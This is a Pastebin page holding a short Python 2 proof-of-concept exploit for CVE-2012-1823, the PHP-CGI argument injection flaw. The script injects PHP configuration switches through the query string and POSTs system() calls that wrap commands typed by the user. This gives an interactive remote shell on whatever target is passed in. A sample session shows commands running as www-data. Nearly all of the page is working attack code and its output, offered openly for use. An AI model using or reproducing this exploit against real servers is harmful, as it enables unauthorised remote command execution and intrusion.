API tools faq
paste
Advertisement
infodox

cve-2012-1823.py

infodox
Dec 16th, 2012
214
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.03 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # cve-2012-1823 proof of concept
  3. # twitter: @info_dox
  4. # website: http://insecurety.net/
  5. import requests
  6. import sys
  7.  
  8. if len(sys.argv) != 2:
  9.     print "Usage: ./cve-2012-1823.py <target>"
  10.     sys.exit(0)
  11.  
  12. target = sys.argv[1]
  13. url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""
  14. lol = """<?php system('"""
  15. lol2 = """');die(); ?>"""
  16. print "[+] Connecting and spawning a shell..."
  17. while True:
  18.     try:
  19.         bobcat = raw_input("%s:~$ " %(target))
  20.         lulz = lol + bobcat + lol2
  21.         hax = requests.post(url, lulz)
  22.         print hax.text
  23.     except KeyboardInterrupt:
  24.         print "\n[-] Quitting"
  25.         sys.exit(1)
  26.  
  27. """
  28. [infodox@yore-ma:~]$ ./cve-2012-1823.py 192.168.1.50
  29. [+] Connecting and spawning a shell...
  30. 192.168.1.50:~$ id
  31. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  32.  
  33. 192.168.1.50:~$ pwd
  34. /var/www
  35.  
  36. 192.168.1.50:~$ uname -a
  37. Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
  38.  
  39. 192.168.1.50:~$
  40. """
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!